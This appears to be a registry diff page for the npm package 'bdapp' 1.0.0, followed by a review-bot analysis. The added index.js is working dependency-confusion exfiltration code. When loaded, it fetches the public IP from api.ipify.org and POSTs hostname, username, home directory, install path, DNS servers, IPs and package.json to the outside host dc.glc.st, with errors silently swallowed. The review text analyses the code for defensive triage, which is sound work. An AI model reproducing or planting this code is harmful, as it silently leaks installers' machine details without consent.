bdapp 1.0.0
Potentially problematic release.
This version of bdapp might be problematic. Click here for more details.
- package/index.js +89 -0
- package/package.json +12 -0
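--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,89 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const http = require("http");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+
+// https://stackoverflow.com/questions/20273128/node-js-how-to-get-my-external-ip-address-in-node-js-app
+const { networkInterfaces } = require('os');
+
+const nets = networkInterfaces();
+const local_ips = Object.create(null); // Or just '{}', an empty object
+for (const name of Object.keys(nets)) {
+for (const net of nets[name]) {
+// Skip over non-IPv4 and internal (i.e. 127.0.0.1) addresses
+// 'IPv4' is in Node <= 17, from 18 it's a number 4 or 6
+const familyV4Value = typeof net.family === 'string' ? 'IPv4' : 4
+if (net.family === familyV4Value && !net.internal) {
+if (!local_ips[name]) {
+local_ips[name] = [];
+}
+local_ips[name].push(net.address);
+}
+}
+}
+
+
+// https://stackoverflow.com/questions/20273128/node-js-how-to-get-my-external-ip-address-in-node-js-app
+var public_ip = Object.create(null); // Or just '{}', an empty object
+
+http.get({'host': 'api.ipify.org', 'port': 80, 'path': '/'}, function(resp) {
+resp.on('data', function(ip) {
+public_ip = "" + ip;
+// console.log(public_ip);
+extractData();
+});
+});
+
+
+// https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/
+// author:- whitehacker003@protonmail.com
+function extractData()
+{
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+lip: JSON.stringify(local_ips),
+pip: public_ip,
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+});
+// console.log(trackingData);
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+// console.log(postData);
+
+var options = {
+hostname: "dc.glc.st", //replace burpcollaborator.net with Interactsh or pipedream
+port: 80,
+path: "/",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+// console.log(options);
+
+var req = http.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();
+}
+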
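Review bot: This module does all of its work at top level, so merely loading it runs the `http.get` to `api.ipify.org`, whose data callback calls `extractData()`. That function POSTs the hostname, username, home directory, install path (`__dirname`), DNS servers, local and public IPs and the whole `package.json` object to the hard-coded host `dc.glc.st` over plain HTTP on port 80. Nothing gates this on an opt-in, and the empty `req.on("error", ...)` handler hides a failed send, so a consumer gets no indication that anything left the machine. The in-file comments point to a dependency-confusion write-up, which suggests a researcher probe rather than a functional library, but the fields are still internal identifiers sent in cleartext; any host that loaded this version should be treated as having disclosed them. For triage, the signal visible in this code is an outbound request to `api.ipify.org` followed by a form-encoded POST to `dc.glc.st` from a build or developer machine. The usual preventive control is to pin internal package names to a private registry or scope so the public name cannot be resolved.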
package/package.json
ADDED